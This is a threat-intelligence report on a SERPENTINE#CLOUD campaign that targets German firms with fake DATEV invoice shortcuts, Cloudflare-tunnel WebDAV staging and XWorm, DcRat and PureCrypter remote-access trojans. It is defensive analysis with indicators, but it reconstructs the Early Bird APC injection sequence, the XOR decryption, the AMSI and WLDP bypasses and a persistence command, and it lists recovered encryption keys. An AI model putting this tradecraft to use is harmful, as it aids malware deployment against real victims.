SERPENTINE#CLOUD: Dissecting a Multi-RAT Cloudflare Tunnel Campaign Targeting German Businesses

Published: 2026-03-08 | TLP:WHITE | breakglass.intelligence

---

TL;DR

An active SERPENTINE#CLOUD campaign is delivering five RAT payloads (2x XWorm, 1x DcRat, 2x PureCrypter) to German-speaking targets through dual Cloudflare tunnels serving WsgiDAV WebDAV shares. The attack chain uses a fake DATEV invoice LNK lure, cross-tunnel redirection, a downloaded Python 3.14 runtime for in-memory decryption, Donut shellcode with Chaskey CTR encryption, and Early Bird APC injection into explorer.exe -- achieving near-fileless execution across all five payloads simultaneously.

---

Attack Chain Overview

The kill chain spans 10 stages from initial lure to final payload execution:

Phishing link
  └─> Cloudflare Tunnel 1 (WebDAV share spoofed as Windows Downloads folder)
       └─> Victim clicks "DATEV-Rechnung Nr. 69928142421.pdf.lnk"
            └─> wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh
                 └─> Cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
                      └─> dat.wsf copies dat.bat to %APPDATA%, executes hidden
                           └─> dat.bat:
                               ├── Opens legitimate ZUGFeRD decoy PDF
                               ├── Downloads Python 3.14.0rc3 from python.org
                               ├── Downloads pun.py + 5 encrypted payload pairs
                               ├── Creates startup persistence (start.bat)
                               └── Executes: python pun.py -i <payload>.bin -k <key>.txt (x5)
                                    └─> Double XOR decrypt → Early Bird APC injection → explorer.exe
                                         └─> Donut shellcode: Chaskey CTR → AMSI/WLDP bypass → .NET CLR
                                              └─> XWorm, DcRat, PureCrypter execute in memory

After initial execution, the chain is completely fileless. Nothing touches disk except the embedded Python runtime downloaded from the legitimate python.org domain.

---

Infrastructure: Dual Cloudflare Tunnels

The campaign uses two trycloudflare.com tunnels, both running WsgiDAV/4.3.3 with anonymous read-write access.

Tunnel 1 -- Lure Delivery

Domain: shortly-flux-corresponding-junction.trycloudflare[.]com

File	Size	Purpose
/Dokumente/DATEV-Rechnung Nr. 69928142421.pdf.lnk	1,371 B	LNK lure (Edge icon, spoofed as PDF)
/dat.wsh	135 B	WSH redirect to Tunnel 2
/desktop.ini	504 B	Spoofs folder as Windows Downloads

The desktop.ini is a nice touch -- it changes the WebDAV share's appearance to look like the Windows Downloads folder when opened in File Explorer, reducing victim suspicion.

Tunnel 2 -- Payload Staging

Domain: licensing-hypothesis-byte-thomas.trycloudflare[.]com

File	Size	Purpose
/dat.wsf	918 B	VBScript loader
/dat.bat	2,205 B	Main stager (decoy + Python + payloads)
/ent/pun.py	3,092 B	APC injection loader
/ent/rp.bin + rp.txt	786,690 B	PureCrypter (Xwann.exe)
/ent/sw.bin + sw.txt	417,026 B	PureCrypter (Iqovaeay.exe)
/ent/xwb.bin + xwb.txt	71,938 B	XWorm
/ent/wx.bin + wx.txt	71,938 B	XWorm variant
/ent/ap.bin + ap.txt	103,170 B	DcRat

Each payload is delivered as a .bin/.txt pair -- the .bin contains the encrypted shellcode and the .txt holds two 8-byte hex XOR keys. Splitting the key material from the ciphertext is a trivial but effective AV evasion technique.

---

The Lure: DATEV Invoice Social Engineering

The LNK file targets German businesses by impersonating a DATEV invoice. DATEV is the dominant tax and accounting software provider in Germany, used by the vast majority of tax advisors and a large portion of SMBs -- making it an extremely high-value lure for this geography.

The LNK uses %ProgramFiles(x86)%\Microsoft\Edge\Application\msedge.exe as its icon source, causing it to display with a browser/document icon rather than the shortcut arrow. Combined with the .pdf.lnk double extension, most victims would see what appears to be a standard PDF.

When executed, dat.bat opens a legitimate ZUGFeRD invoice PDF from invoice-portal[.]de as a decoy -- the victim sees a real invoice document while the malware executes in the background.

---

Encryption: Three Layers Deep

Layer 1 -- Double XOR (pun.py)

Each payload pair uses two 8-byte hex keys for repeating XOR decryption:

# Decryption logic from pun.py
plaintext = XOR(XOR(ciphertext, key2), key1)

Key material per payload:

Payload	Family	Key 1	Key 2
rp	PureCrypter	f368471bcb862de6	c2590c0d1d103109
sw	PureCrypter	d9dcad63d4741260	1b08df34ddd6415c
xwb	XWorm	7b5724134a5b533f	03e55c21392f560f
wx	XWorm	f282362d2c7be0af	6189b12ea8ca5b98
ap	DcRat	0a3313fc809c66d6	c180a1be31e517bb

This is a Generation 1 encryption variant in the SERPENTINE#CLOUD taxonomy. The campaign has evolved through multiple encryption generations, but continues to redeploy earlier variants alongside newer ones.

Layer 2 -- Donut Shellcode (v0.9.2/v0.9.3)

All five decrypted payloads are Donut shellcode loaders, each containing an identical 23,925-byte Donut stub. The Donut instances use:

• Cipher: Chaskey block cipher in CTR mode (128-bit blocks, 16 rounds)
• Encryption boundary: Instance data from offset 0x230 onward
• Key storage: 16-byte master key at instance+0x04, 16-byte counter at instance+0x14

Embedded in each Donut loader are the following runtime bypasses:

• AmsiInitialize / AmsiScanBuffer / AmsiScanString -- AMSI bypass
• WldpQueryDynamicCodeTrust / WldpIsClassInApprovedList -- WLDP bypass

These ensure the .NET assemblies loaded via Donut's CLR bootstrapping are not scanned by Defender's in-process hooks.

Layer 3 -- C2 Configuration Encryption

The final .NET payloads use their own encryption for C2 configuration storage:

• XWorm: AES-256-ECB with a non-standard key derivation -- MD5(key) expanded via overlapping Array.Copy into a 32-byte buffer
• DcRat: PBKDF2 with AES-256-CBC, salt=DcRatByqwqdanchun (ASCII), 50,000 iterations, HMAC-SHA256 authentication

---

Injection Technique: Early Bird APC

pun.py implements Early Bird APC injection targeting explorer.exe. This technique queues the shellcode as an Asynchronous Procedure Call before the process's main thread begins execution:

# Reconstructed injection flow from pun.py
hProcess, hThread, _, _ = CreateProcessA(
    "explorer.exe",
    CREATE_SUSPENDED=0x4
)
lpAddr = VirtualAllocEx(
    hProcess,
    MEM_COMMIT | MEM_RESERVE=0x3000,
    PAGE_READWRITE=0x4
)
WriteProcessMemory(hProcess, lpAddr, decrypted_shellcode)
VirtualProtectEx(hProcess, lpAddr, PAGE_EXECUTE_READ=0x20)
QueueUserAPC(lpAddr, hThread)
ResumeThread(hThread)

This sequence runs five times -- once per payload -- spawning five suspended explorer.exe processes, each hosting a different RAT. The PAGE_READWRITE -> PAGE_EXECUTE_READ transition via VirtualProtectEx avoids allocating RWX memory, which is a common detection signal.

---

Final Payloads

XWorm V6.4 (xwb, wx)

Both XWorm instances are VB.NET assemblies running V6.4 by celestialproject.org -- a redistributed version of the XWorm MaaS lineage (XCoder v2-v5.6 -> XCoderTools V6.0 at $500/lifetime -> celestialproject.org V6.4, now offline).

Capabilities include: remote shell, DDoS (StartDDos/StopDDos), offline and live keylogging, plugin system, webcam capture via avicap32.dll, hosts file manipulation, USB spread, UAC bypass, screenshot capture, credential theft, process injection (injRun), and file download/execution.

DcRat (ap)

The DcRat instance carries the DcRatByqwqdanchun signature and includes: plugin architecture with MessagePack serialization, anti-VM detection (VMware, VirtualBox, Sandboxie), anti-process kill list (Taskmgr, ProcessHacker, procexp, MSASCui), runtime AMSI bypass via amsi.dll patching, ETW bypass via EtwEventWrite patching, NtProtectVirtualMemory for memory protection manipulation, SSL/TLS C2 with certificate pinning, and Pastebin integration for backup C2 resolution.

PureCrypter (rp, sw)

Both PureCrypter instances are .NET resource loaders that carry additional encrypted inner payloads. These act as secondary droppers, likely delivering additional malware families not captured in this analysis snapshot.

---

C2 Infrastructure

C2 Server	RAT(s)	Port(s)	Hosting	RDP Hostname
178.16.55[.]160	XWorm (xwb)	2323	Omegatech LTD, AS202412 (Seychelles)	DESKTOP-BUL6K1U
43.157.1[.]71	XWorm (wx) + DcRat	2323, 3232	Tencent Cloud, AS132203 (Frankfurt)	172_28_0_12 (Docker)

Key findings from C2 reconnaissance:

• 178.16.55[.]160 sits on Seychelles-registered bulletproof hosting. The same /24 subnet hosts other known RAT C2s (VenomRAT observed on .129). Windows VPS with IIS 10.0 default, RDP and SMB exposed.
• 43.157.1[.]71 runs on Tencent Cloud Frankfurt, hosting both XWorm (port 2323) and DcRat (port 3232) inside a Docker container (hostname 172_28_0_12). This co-location confirms a single operator managing both RAT families.
• Both servers expose RDP (3389/tcp) and SMB (445/tcp), though Guest/null sessions are disabled.
• Infrastructure was provisioned in phases: 178.16.55[.]160 set up on 2026-01-19, 43.157.1[.]71 set up on 2026-02-15.

Decrypted C2 Configurations

XWorm (xwb):

Host:           178.16.55[.]160
Port:           2323
Version:        XWorm V6.4 by celestialproject.org
AES Key:        hP1RGR7hiCmurHiy
Encryption Key: <666666>
Separator:      <XWormmm>
Mutex:          USB.exe

XWorm (wx):

Host:           43.157.1[.]71
Port:           2323
AES Key:        H9r27PXZ8Hi3vMDL
Encryption Key: <666666>
Separator:      <XWormmm>
Mutex:          USB.exe

DcRat (ap):

Host:           127.0.0.1, 43.157.1[.]71
Port:           3232
Master Key:     A82RoLB2PKbWEikHJ55bENolnscLDEsc
Group:          Default
Certificate:    CN=DcRat, Issuer CN=EBOLA, O=DcRat By qwqdanchun
Cert Location:  CN/SH (Shanghai)
Cert Created:   2025-05-06
AMSI Target:    amsi.dll (base64: YW1zaS5kbGw=)
Pastebin C2:    null

The DcRat certificate issuer CN=EBOLA with Shanghai locality is consistent with the qwqdanchun DcRat builder defaults and does not necessarily indicate Chinese attribution for the campaign operator.

---

Operator OPSEC Failure

The LNK file retained builder machine metadata:

Field	Value
Machine name	vincent-pc
SID	S-1-5-21-4189620101-4119968542-7375749001-500
Account type	Built-in Administrator (RID 500)

Running as the built-in Administrator account (not a renamed admin) and leaving machine metadata in the LNK is a significant OPSEC failure. The SID's domain portion (4189620101-4119968542-7375749001) is a fingerprint for this specific builder installation and can be used for cross-campaign correlation.

---

Persistence

Three persistence mechanisms ensure survivability across reboots:

1. Startup folder BAT (T1547.001): %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\start.bat -- re-executes all five payloads via the downloaded Python runtime, uses powershell -WindowStyle Hidden for self-concealment
2. Registry Run key (T1547.001): DcRat writes to SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
3. Scheduled task (T1053.005): DcRat creates a logon task with highest privileges via schtasks /create /f /sc onlogon /rl highest

---

Operational Timeline

WebDAV file metadata reveals the campaign's build and deployment cadence:

Date	Activity
2023-06-22	desktop.ini created -- template reuse from a prior campaign wave
2025-08-05	pun.py last modified (APC injection loader)
2025-12-13	PureCrypter payload pair (rp.bin/rp.txt) built
2025-12-15	Tunnel 2 /ent/ directory staged with pun.py and initial payloads
2026-01-16	dat.wsf created on Tunnel 2
2026-01-19	C2 server 178.16.55[.]160 provisioned (IIS default page timestamp)
2026-01-25--26	sw.bin, xwb.bin (PureCrypter + XWorm) uploaded
2026-02-15	C2 server 43.157.1[.]71 provisioned
2026-02-15--16	ap.bin, wx.bin (DcRat + XWorm variant) uploaded; Tunnel 1 root created
2026-03-02	dat.wsh created on Tunnel 1 (cross-tunnel redirect link)
2026-03-04 01:38--01:43	dat.wsh modified, LNK lure placed in /Dokumente/
2026-03-04 10:58--11:01	dat.bat and dat.wsf modified (active tuning)
2026-03-04 16:30	/Dokumente/ last modified

Infrastructure was built over ~3 months (Dec 2025 -- Mar 2026), with the operator actively managing and modifying stager scripts on the day of analysis. Both tunnels were confirmed live and serving malware as of 2026-03-04 18:56 UTC.

---

MITRE ATT&CK Mapping

Technique	ID	Implementation
Phishing: Spearphishing Link	T1566.002	Email with link to WebDAV share
User Execution: Malicious File	T1204.002	LNK disguised as DATEV PDF
Command and Scripting: VBScript	T1059.005	dat.wsh / dat.wsf WSH chain
Command and Scripting: Windows Command Shell	T1059.003	dat.bat stager
Command and Scripting: Python	T1059.006	pun.py shellcode injector
Process Injection: APC Injection	T1055.004	Early Bird APC into explorer.exe
Signed Binary Proxy Execution	T1218.005	wscript.exe proxy
Boot/Logon Autostart: Startup Folder	T1547.001	start.bat in Startup
Boot/Logon Autostart: Registry Run Keys	T1547.001	DcRat registry persistence
Scheduled Task/Job	T1053.005	DcRat schtasks persistence
Obfuscated Files: Encrypted Payload	T1027.013	Multi-layer XOR + Chaskey CTR + AES
Subvert Trust Controls: Disable/Modify Tools	T1562.001	Runtime AMSI/ETW/WLDP patching
Proxy: External Proxy	T1090.002	Cloudflare tunnel for staging
Web Service: Dead Drop Resolver	T1102.001	DcRat Pastebin backup C2
Masquerading: Match Legitimate Name	T1036.005	DATEV invoice filename
Virtualization/Sandbox Evasion	T1497	DcRat anti-VM checks

---

Indicators of Compromise

Network Indicators

# Cloudflare Tunnels (WebDAV staging)
shortly-flux-corresponding-junction.trycloudflare[.]com
licensing-hypothesis-byte-thomas.trycloudflare[.]com

# C2 Servers
178.16.55[.]160:2323    # XWorm (xwb) - Omegatech LTD / Seychelles
43.157.1[.]71:2323      # XWorm (wx)  - Tencent Cloud / Frankfurt
43.157.1[.]71:3232      # DcRat (ap)  - Tencent Cloud / Frankfurt

# Legitimate (decoy, not malicious)
invoice-portal[.]de     # ZUGFeRD decoy PDF host
python.org/ftp/python/3.14.0/python-3.14.0rc3-embed-amd64.zip  # Python runtime

File Hashes -- Final .NET Payloads (SHA256)

# PureCrypter
6afbdd737bf86294c83d722f4470fe94fff8ed1c52b3739bcd3cffd3b97a3471  rp_pe (Xwann.exe)
a537078adf6734680d37af56b815aad682d684d77020d3aeb147f119546bb85a  sw_pe (Iqovaeay.exe)

# XWorm V6.4
328e3f46caf5e63c9784e9bf05e066dab3c44eb84274b2496a1bb6b0bd09bad0  xwb_pe
4df1eb2cefeffcf0d922d1e0304893cf13ed4cb03678f75be5f7275cb75e720d  wx_pe

# DcRat (qwqdanchun)
b690b7b7c455c50170a29c812d2ebbae89a539bc63033445cb5c2d8255d13ffe  ap_pe

File Hashes -- Decrypted Donut Shellcode (SHA256)

6ddcded14fefaf2ed1480c69bd41a131e6467bde48a6abb2b0dad34efbfe8db6  rp
b7cc6e1d870746b8903dfbf777f11b6192d2889065a542624087bd1f350458b0  sw
58f6f2b53da80c073a75772f1783dbc5b90777203bc4d613aec4956136874b4f  xwb
c2cea1caabb154dfcfe592f2d7b4ca5eeb0814c326c0b36cb2a6c2ff912acf51  wx
938f864252c133013937b7215dd8cd867b61c2df9a02b89b88e6ee9c70e63d8f  ap

File Hashes -- Encrypted Payloads (SHA256)

4a40ee942e1e84d7dbc8211fed9129c7355f32e5fcdef26c6e8aa9f82f400f7e  rp.bin
17f9dc72a12bf4df6110f746996268ee31d60603ea80e630b025d085d3ecee4d  sw.bin
66adbb9ab7d9cbbfcd46d9de226e8c6ce5fa5edf419882f714541c2a534acbb9  xwb.bin
d413060d381d9eaf52ec0f34402f35fc4116c4ca2fd715589f79c1c275058164  wx.bin
f65d9f6c995b5e8dee81ca3e4a774f5edf027d236da1a2bfefa76382abf913d3  ap.bin

File Hashes -- XOR Key Files (SHA256)

3e45f556d39df5c6d6d302b3425b021085b3178f1db75a376e0751f129c97654  rp.txt
dac104bf9bccf56cb0fc2fe05c8b516c64bee750b2629bf967903d0da5480a6a  sw.txt
9f46e66782e5d3056ab5e75c26d50b0a33efd9debb007fc2ddf23cf15315ea91  xwb.txt
72b94316fc457d1ecb9eccdcafb36caf37b20ad51f3cd9a3b4d01a9e0c2b19fc  wx.txt
c8da433c3a995e210ea22c49856a65be7a7b8f4b4021008fb5fa685e9ff4d139  ap.txt

Builder Artifacts

Machine:  vincent-pc
SID:      S-1-5-21-4189620101-4119968542-7375749001-500
Account:  Built-in Administrator (RID 500)

---

Attribution

This campaign is part of the SERPENTINE#CLOUD cluster tracked by Securonix, active since October 2024. Matching indicators include the identical delivery chain (Cloudflare tunnel -> WebDAV -> LNK -> WSH -> WSF -> BAT -> Python -> Donut), the same Python loader pattern with Early Bird APC injection, the same double-XOR encryption with 8-byte hex keys, identical Donut versions (v0.9.2/v0.9.3), consistent DATEV invoice targeting, and the same RAT families (XWorm, DcRat, with prior waves also deploying AsyncRAT, VenomRAT, and Remcos).

This represents a Generation 1 encryption variant in the March 2026 wave.

---

References

• Securonix: Analyzing SERPENTINE#CLOUD
• Derp.ca: Python Loader Evolution - Five Encryption Generations
• Cofense: Abusing Windows File Explorer and WebDAV for Malware Delivery
• Proofpoint: Threat Actor Abuses Cloudflare Tunnels to Deliver RATs
• Forcepoint: AsyncRAT via Python and TryCloudflare